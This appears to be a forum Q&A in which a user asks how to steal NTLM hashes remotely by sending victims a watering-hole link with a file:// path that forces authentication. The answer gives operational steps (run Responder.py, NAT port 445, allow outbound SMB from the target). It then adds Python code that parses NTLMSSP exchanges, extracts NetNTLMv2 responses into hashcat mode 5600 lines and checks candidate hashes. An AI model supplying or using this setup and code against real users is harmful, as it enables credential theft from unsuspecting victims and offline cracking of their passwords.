Watering Hole Website NTLM Steal Attack
I'm trying to recreate a watering hole SMB theft attack where you send a victim a link to your website containing code like "file://ip/file.gif", causing forced authentication which passes the NTLM hash. I have the code which executes the process (check reference links).
But how can I retrieve/steal the NTLM hash back over the internet remotely without being on the local network?
This process can be done locally very easily, but I'm struggling to find an NTLM listener to use over the internet remotely on a website.
For this kind of attack you could use, for example, Responder.py. Please bear in mind that in order to make it work over the internet it would be necessary to:
- Enable outbound SMB connections on the server that you plan to attack.
- NAT port 445 on the attacker computer and ensure that no firewall is blocking it.
Once those two conditions are met you can configure Responder.py to enable an SMB server and then start Responder.py.
Now you just need to test it by accessing it.
Please do not forget to close everything back up once you have finished playing!
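To make concrete what a listener such as Responder actually has to do once the forced authentication arrives, here is an added example (my own code, not Responder's, and not from the original question or answer) that builds a constructed NTLMSSP CHALLENGE (Type 2) and AUTHENTICATE (Type 3) exchange, records the 8-byte server challenge the listener chose, extracts the client's NTLMv2 response, and emits the NetNTLMv2 line in the format hashcat mode 5600 consumes. The user, domain, workstation, NT hash, client blob and negotiate-flag values are all assumptions constructed for the demo. One point the example makes explicit: what a listener captures is the NetNTLMv2 response, an HMAC-MD5 computed from the NT hash and the server challenge, not the NT hash itself, so it still has to be cracked offline (or relayed), which is why the listener must log its own challenge alongside the response. Before relying on an internet-facing listener, also test that TCP 445 is actually reachable end to end, since many networks filter it.

```python
"""Minimal NTLMSSP capture logic (added example, not Responder's own code).

Models what an SMB/HTTP NTLM listener records when a client follows a
file://attacker/x.gif link: the server challenge it chose (Type 2) and the
client's NTLMv2 response (Type 3), combined into a hashcat -m 5600 line.
Every message here is constructed locally; nothing is sent on the network.
"""
import hmac
import struct

SIGNATURE = b"NTLMSSP\x00"
NTLM_CHALLENGE = 2
NTLM_AUTHENTICATE = 3


def _pack_field(data: bytes, offset: int) -> bytes:
    # NTLMSSP "security buffer": Len, MaxLen, Offset (little-endian)
    return struct.pack("<HHI", len(data), len(data), offset)


def _read_field(msg: bytes, at: int) -> bytes:
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
    return msg[offset:offset + length]


def build_challenge(server_challenge: bytes, target: str = "FAKESRV") -> bytes:
    """Type 2 message the listener sends; the challenge is what it must remember."""
    name = target.encode("utf-16-le")
    msg = SIGNATURE + struct.pack("<I", NTLM_CHALLENGE)
    msg += _pack_field(name, 48)                 # TargetName (payload starts at 48)
    msg += struct.pack("<I", 0x00028205)         # NegotiateFlags (constructed value)
    msg += server_challenge                      # 8-byte ServerChallenge at offset 24
    msg += b"\x00" * 8                           # Reserved
    msg += _pack_field(b"", 48 + len(name))      # TargetInfo (empty in this demo)
    return msg + name


def build_authenticate(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    """Type 3 message a Windows client sends back (constructed, minimal layout)."""
    # Order of security buffers: LM, NT, Domain, User, Workstation, SessionKey
    blobs = [b"\x00" * 24, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header = SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE)
    payload, cursor = b"", 64                    # payload follows the 64-byte fixed header
    for blob in blobs:
        header += _pack_field(blob, cursor)
        payload += blob
        cursor += len(blob)
    header += struct.pack("<I", 0x00088205)      # NegotiateFlags (constructed value)
    return header + payload


def ntlmv2_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 per MS-NLMP: NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob)."""
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    proof = hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()
    return proof + blob


def server_challenge_from(msg: bytes) -> bytes:
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != NTLM_CHALLENGE:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    return msg[24:32]


def capture(challenge_msg: bytes, auth_msg: bytes) -> dict:
    """What the listener logs: user, domain, its own challenge and the NetNTLMv2 line."""
    if auth_msg[:8] != SIGNATURE or struct.unpack_from("<I", auth_msg, 8)[0] != NTLM_AUTHENTICATE:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    nt_resp = _read_field(auth_msg, 20)          # NtChallengeResponse buffer
    domain = _read_field(auth_msg, 28).decode("utf-16-le")
    user = _read_field(auth_msg, 36).decode("utf-16-le")
    if len(nt_resp) <= 24:
        raise ValueError("NTLMv1/LM response; this demo only handles NTLMv2")
    chal = server_challenge_from(challenge_msg)
    proof, blob = nt_resp[:16], nt_resp[16:]
    line = f"{user}::{domain}:{chal.hex()}:{proof.hex()}:{blob.hex()}"  # hashcat -m 5600
    return {"user": user, "domain": domain, "challenge": chal,
            "proof": proof, "blob": blob, "hashcat": line}


def check_candidate(cap: dict, nt_hash: bytes) -> bool:
    """The cracker's inner loop: does this candidate NT hash reproduce the captured proof?"""
    expected = ntlmv2_response(nt_hash, cap["user"], cap["domain"], cap["challenge"], cap["blob"])
    return hmac.compare_digest(expected[:16], cap["proof"])


def demo() -> dict:
    """Constructed exchange: the NT hash, challenge and blob below are test values."""
    nt_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # MD4("password"), well-known
    chal = bytes.fromhex("0123456789abcdef")                      # listener's chosen challenge
    blob = (bytes.fromhex("0101000000000000") + bytes(8)          # NTLMv2 blob header, timestamp
            + bytes.fromhex("1122334455667788") + bytes(8))       # client nonce, empty AV pairs
    t2 = build_challenge(chal)
    t3 = build_authenticate("alice", "CORP", "WS01",
                            ntlmv2_response(nt_hash, "alice", "CORP", chal, blob))
    cap = capture(t2, t3)
    cap["cracked"] = check_candidate(cap, nt_hash)
    return cap


if __name__ == "__main__":
    result = demo()
    print(result["hashcat"])
    print("candidate matches:", result["cracked"])
```

The `capture` function is the whole job of the listener: it has nothing to "steal" unless it both supplied the challenge and kept it. `check_candidate` is what hashcat does per guess; running it with the wrong NT hash returns False, which is the practical meaning of "you captured a response, not the hash".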